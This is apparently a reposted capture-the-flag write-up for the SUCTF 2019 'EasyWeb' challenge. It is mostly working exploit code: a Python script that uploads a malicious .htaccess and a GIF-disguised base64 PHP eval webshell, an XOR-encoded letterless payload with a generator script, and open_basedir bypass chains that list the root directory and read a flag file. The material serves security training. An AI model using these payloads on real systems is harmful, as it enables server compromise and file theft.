当前位置：网站首页>[SUCTF 2019]EasyWeb

[SUCTF 2019]EasyWeb

2022-06-09 02:02:00 【I·CE】

Knowledge point ：

AddType application/x-httpd-php .ahhh//http Header addition makes .ahhh As php Script parsing

GIF89a File header spoofing

GIF89a12		12 To make up for 8 Bytes , Satisfy base64 Coding rules

Bypass open_basedir

No numbers, no letters webshell

python Upload script


import requests
import base64

htaccess = b""" #define width 1337 #define height 1337 AddType application/x-httpd-php .ahhh php_value auto_append_file "php://filter/convert.base64-decode/resource=./shell.ahhh" """
shell = b"GIF89a12" + base64.b64encode(b"<?php eval($_REQUEST['cmd']);?>")
url = "http://1c512d61-43b5-41ae-9f74-4228d9af8caf.node4.buuoj.cn:81/?_=${%86%86%86%86^%d9%c1%c3%d2}{%86}();&%86=get_the_flag"

files = {
    'file':('.htaccess',htaccess,'image/jpeg')}
data = {
    "upload":"Submit"}
response = requests.post(url=url, data=data, files=files)
print(response.text)

files = {
    'file':('shell.ahhh',shell,'image/jpeg')}
response = requests.post(url=url, data=data, files=files)
print(response.text)

XOR scripts ：

function finds($string)
{
    
    $index = 0;
    $a = [33, 35, 36, 37, 40, 41, 42, 43, 45, 47, 58, 59, 60, 62, 63, 64, 92, 93, 94, 123, 125, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255];
    for ($i = 27; $i < count($a); $i++) {
    
        for ($j = 27; $j < count($a); $j++) {
    
            $x = $a[$i] ^ $a[$j];
            for ($k = 0; $k < strlen($string); $k++) {
    
                if (ord($string[$k]) == $x) {
    
                    echo $string[$k] ;
                    echo '<br/>';
                    echo '%' . dechex($a[$i]) . '^%' . dechex($a[$j]) ;
                    echo '<br/>';
                    $index++;
                    if ($index == strlen($string)) {
    
                        return 0;
                    }
                }
            }
        }
    }
}
finds("phpinfo");

bypass open_basedir

chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');

chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(scandir("/"));
chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');echo(file_get_contents('/THis_Is_tHe_F14g'));